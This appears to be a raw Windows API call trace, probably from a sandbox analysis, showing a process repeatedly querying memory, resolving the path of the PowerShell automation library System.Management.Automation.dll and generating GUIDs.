	[0317.972] VirtualQuery (in: lpAddress=0x1cba90, lpBuffer=0x1cc950, dwLength=0x30 | out: lpBuffer=0x1cc950*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.975] VirtualQuery (in: lpAddress=0x1cba90, lpBuffer=0x1cc950, dwLength=0x30 | out: lpBuffer=0x1cc950*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.977] VirtualQuery (in: lpAddress=0x1cba90, lpBuffer=0x1cc950, dwLength=0x30 | out: lpBuffer=0x1cc950*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.978] VirtualQuery (in: lpAddress=0x1cba90, lpBuffer=0x1cc950, dwLength=0x30 | out: lpBuffer=0x1cc950*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.978] VirtualQuery (in: lpAddress=0x1cb180, lpBuffer=0x1cc040, dwLength=0x30 | out: lpBuffer=0x1cc040*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb210, lpBuffer=0x1cc0d0, dwLength=0x30 | out: lpBuffer=0x1cc0d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.979] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.980] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.980] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.980] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.980] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.980] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.291] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.291] VirtualQuery (in: lpAddress=0x1cb5c0, lpBuffer=0x1cc480, dwLength=0x30 | out: lpBuffer=0x1cc480*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.291] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.291] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.292] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.292] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.292] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x2b62a368, Data2=0xe5d2, Data3=0x428d, Data4=([0]=0xbf, [1]=0x4d, [2]=0xc0, [3]=0xdb, [4]=0xe0, [5]=0x45, [6]=0xe4, [7]=0x4b))) returned 0x0
	[0318.293] VirtualQuery (in: lpAddress=0x1cb180, lpBuffer=0x1cc040, dwLength=0x30 | out: lpBuffer=0x1cc040*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.293] VirtualQuery (in: lpAddress=0x1cb210, lpBuffer=0x1cc0d0, dwLength=0x30 | out: lpBuffer=0x1cc0d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.293] VirtualQuery (in: lpAddress=0x1cb430, lpBuffer=0x1cc2f0, dwLength=0x30 | out: lpBuffer=0x1cc2f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.294] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x4994718e, Data2=0xf0ae, Data3=0x4f5d, Data4=([0]=0xb7, [1]=0x74, [2]=0x7d, [3]=0xc9, [4]=0xe5, [5]=0xcf, [6]=0xd8, [7]=0x1c))) returned 0x0
	[0318.294] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x15af4672, Data2=0x7d50, Data3=0x4d7a, Data4=([0]=0x88, [1]=0x32, [2]=0x2, [3]=0x1a, [4]=0xc8, [5]=0x36, [6]=0xd7, [7]=0xc1))) returned 0x0
	[0318.294] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa2b32480, Data2=0x1440, Data3=0x4b12, Data4=([0]=0x89, [1]=0x9a, [2]=0x96, [3]=0x32, [4]=0x67, [5]=0x78, [6]=0x70, [7]=0xea))) returned 0x0
	[0318.295] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x5bdecbd, Data2=0x6a44, Data3=0x4301, Data4=([0]=0x97, [1]=0xcf, [2]=0x1b, [3]=0x9, [4]=0xd6, [5]=0x54, [6]=0x5f, [7]=0x73))) returned 0x0
	[0318.295] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7f525b0, Data2=0x9a5e, Data3=0x4bf3, Data4=([0]=0x9f, [1]=0xb9, [2]=0x36, [3]=0xd2, [4]=0x5a, [5]=0x93, [6]=0xac, [7]=0xe3))) returned 0x0
	[0318.295] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x168d5db7, Data2=0xb23c, Data3=0x4a6d, Data4=([0]=0x98, [1]=0xdc, [2]=0x3e, [3]=0xd1, [4]=0x64, [5]=0x9b, [6]=0xa5, [7]=0x8))) returned 0x0
	[0318.296] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb788e1f7, Data2=0x873e, Data3=0x47ff, Data4=([0]=0xaf, [1]=0x1e, [2]=0x58, [3]=0xa4, [4]=0xbb, [5]=0xb0, [6]=0x36, [7]=0x39))) returned 0x0
	[0318.296] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xdec1901f, Data2=0xd513, Data3=0x466b, Data4=([0]=0x87, [1]=0xe9, [2]=0x81, [3]=0xec, [4]=0xdf, [5]=0x30, [6]=0x34, [7]=0xe7))) returned 0x0
	[0318.296] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.296] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.296] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.297] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.297] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.297] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.297] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
